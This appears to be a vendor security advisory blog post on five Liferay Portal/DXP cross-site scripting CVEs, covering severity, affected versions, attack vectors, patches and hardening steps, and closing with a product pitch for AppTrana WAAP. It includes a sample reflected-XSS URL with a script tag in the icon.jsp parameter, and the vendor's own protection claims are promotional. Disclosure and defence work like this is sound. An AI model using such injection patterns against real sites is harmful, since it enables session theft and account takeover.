Multiple XSS Vulnerabilities in Liferay Portal & DXP: Analysis, Impact, and Prevention

Multiple Cross-Site Scripting (XSS) vulnerabilities were disclosed across Liferay Portal and DXP in 2024–2025, affecting workflow modules, blogs, rich-text fields, custom object labels, and search widgets. Notably, a stored XSS in the Workflow Process Builder (CVE-2025-62239) highlights the potential risk of executing malicious scripts in administrators’ browsers.

Other vulnerabilities, including reflected and stored XSS in public-facing blogs and configuration fields, further emphasize the need for comprehensive mitigation. These vulnerabilities can allow attackers to steal sessions, alter workflows, or deliver phishing payloads.

Key XSS Vulnerabilities Identified in Liferay

Liferay Portal and Liferay DXP are widely used enterprise platforms for building digital experiences, powering intranets, customer portals, and content management systems. Their modular architecture, extensive customization options, and administrative flexibility make them powerful but also increase the potential exposure to web application vulnerabilities such as Cross-Site Scripting (XSS).

Between 2024 and 2025, multiple XSS vulnerabilities were reported across various Liferay components. These vulnerabilities were publicly disclosed through vendor security advisories and NVD (National Vulnerability Database) entries, highlighting risks across both stored and reflected XSS types.

The notable disclosures include:

• CVE-2025-62239 — Stored XSS in Workflow Process Builder
• CVE-2025-4576 — Reflected XSS in Blogs Entry Caption
• CVE-2025-43791 — Stored XSS in Rich Text Fields
• CVE-2025-4388 — Reflected XSS in Marketplace App Manager
• CVE-2025-43794 — Stored XSS in Instance Configuration (CDN Host Fields)

CVE-2025-62239 — XSS in Workflow Process Builder (Stored)

Risk Analysis

Severity: Medium
CVSSv4.0: Base Score: 4.6 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low

A stored (persistent) XSS vulnerability exists in the Workflow Process Builder module. Attackers with workflow editing privileges can inject malicious JavaScript into workflow definitions. The injected payload executes when administrators or other users view or edit those workflows.

Affected Versions:

• Liferay Portal 4.3.21–7.4.3.111
• Liferay DXP 2023 Q3–Q4 builds

Attack Vector:

• Requires authenticated access with workflow editing rights.
• Payload stored in workflow definition metadata (e.g., JSON/XML).
• Executes in admin browser when workflows are rendered.

Impact & Exploitation Possibilities

• Since the attacker can execute JavaScript in an administrative UI context, they can steal session cookies, perform UI manipulation, or invoke actions via the admin interface.
• They may modify workflows or other configuration settings, possibly introducing further persistence or backdoors.
• Because it is stored, the payload remains until removed; it survives restarts or app reloads.

Liferay’s patch introduced stronger output encoding for workflow metadata and stricter input filtering to strip HTML tags from process labels.

CVE-2025-4576 — Reflected XSS in Blogs entry caption

Risk Analysis

Severity: Medium
CVSSv4.0: Base Score: 6.9 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low

A reflected XSS in the Blogs module’s entry_cover_image_caption.jsp allows attackers to inject scripts through crafted parameters in public-facing URLs.

Affected Versions:

Liferay Portal / DXP builds active during mid-2025 disclosures.

Attack Vector:

• Unauthenticated attacker crafts malicious URLs with script payloads.
• Payload reflected directly into HTML response without proper encoding.

Impact & Exploitation

• Because it is reflected (not stored), exploitation is transient; the attacker’s payload executes when the victim visits the crafted link.
• The attacker can steal session tokens (if cookies are not HttpOnly), perform DOM-based attacks, or attempt to chain further actions (e.g. via authenticated UI).
• This is a lower overall risk than stored XSS but still dangerous, especially for cross-site link-based attacks or phishing links.

Liferay encoded the caption output in the JSP template and introduced server-side validation to reject suspicious payloads.

CVE-2025-43791 — XSS in Rich Text Fields (Multiple Stored XSS)

Risk Analysis

Severity: Medium
CVSSv4.0: Base Score: 4.8 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low

Multiple stored XSS vulnerabilities were found in rich-text-capable fields across web content, documents, and custom data types.

Affected Versions:

Liferay Portal 7.3.0–7.4.3.111
Liferay DXP 2023 Q3/Q4 series

Attack Vector:

• Injecting malicious HTML/JS into rich-text fields.
• Payload executes when content is viewed.

Impact & Exploitation

• Stored XSS means any user (or visitors) viewing a page containing that content will execute the malicious script.
• The attacker might hijack sessions, modify DOM/UI, redirect victims, or embed further payloads.
• In multi-tenant or shared content contexts, the attacker might exploit content rendered for others.

Liferay standardized sanitization across its Data Engine and web content modules, enforcing a “safe HTML” whitelist that removes scripts, event attributes, and inline JavaScript URLs.

CVE-2025-4388 — Reflected XSS in Marketplace App Manager Web

Risk Analysis

Severity: Medium
CVSSv4.0: Base Score: 6.9 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Exploit available in public: No
Exploit complexity: Low

A reflected XSS vulnerability in the marketplace-app-manager-web module (via icon.jsp) allows crafted parameters to inject JavaScript in the app management interface.

Affected Versions:

Liferay Portal 7.4.0–7.4.3.131,
Liferay DXP 2024 Q4.x and related builds

Attack vector & conditions

• An attacker crafts a URL to …/o/marketplace-app-manager-web/icon.jsp?param=<script>…</script> (or similar) where the script payload is reflected in the resulting page.
• Because the JSP does not sufficiently sanitize or HTML-encode the reflected input, the script executes in the context of the user’s browser.

Impact & Exploitation

• Because it is reflected, exploitation requires victim interaction (clicking the crafted link).
• The attacker could steal session or cookie information, manipulate UI, or inject further requests.
• Being in a module related to “app management / marketplace,” it may allow attacks when admins or privileged users view that module increasing risk.

The patch released in Liferay DXP 2024.Q1.13 added strict encoding for reflected inputs and rejected invalid parameter characters (<, >, quotes).

CVE-2025-43794 — Stored XSS in Instance Configuration (CDN host fields)

Risk Analysis

Severity: Medium
CVSSv4.0: Base Score: 4.6 Medium
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Exploit available in public: No
Exploit complexity: Low

This vulnerability allows stored XSS via the Instance Configuration settings: specifically, the CDN Host HTTP and CDN Host HTTPS text fields. An authenticated user with “instance administrator” privileges can inject malicious script into those fields, which later gets included across all pages.

Affected Versions:

Liferay Portal 7.4.0–7.4.3.111 and related DXP versions.

Attack Vector:

• Authenticated instance admins insert script tags into CDN configuration fields.
• Scripts execute globally on all pages using those values.

Impact & Exploitation

• This is high-impact because the script is injected globally, affecting multiple users (including admins).
• Attackers can escalate as the script runs everywhere the configuration is used (header/footer).
• Even if only admins can set, the reach of the payload is broad.

Patched versions strictly sanitize and validate input as hostnames, stripping all tags and script-like characters before storage.

Protecting Your Liferay Environment

Even if your version is not directly listed, you should assume similar vectors may exist.
Here is what to do:

Immediate steps

• Apply the latest patches from Liferay’s Security Advisories.
• Enable WAF or WAAP virtual patching for suspected endpoints (AppTrana WAAP can block XSS payloads instantly).
• Search for stored scripts in workflow definitions, configuration files, and database fields.

Hardening measures

• Enforce HttpOnly and SameSite cookies to reduce session theft impact.
• Apply a Content Security Policy (CSP) to restrict inline scripts.
• Train admins not to paste HTML/JS snippets into configuration or content fields.
• Integrate automated XSS tests into CI pipelines.

AppTrana Coverage for Liferay XSS Vulnerabilities

AppTrana WAAP provides comprehensive protection against CVE-2025-62239 and similar XSS vulnerabilities. It acts as a first line of defense by blocking malicious inputs before they reach workflow interfaces and offers virtual patching, securing your Liferay environment even before vendor updates are applied.

AppTrana enforces content security policies, validates and sanitizes user inputs, continuously monitors workflow pages for vulnerabilities, and oversees administrative actions to detect suspicious behavior. By combining prevention, detection, and mitigation in a single solution, AppTrana ensures that Liferay customers are proactively protected against script injection attacks without solely relying on patch updates.

Stay tuned for more relevant and interesting security articles. Follow Indusface on Facebook, Twitter, and LinkedIn.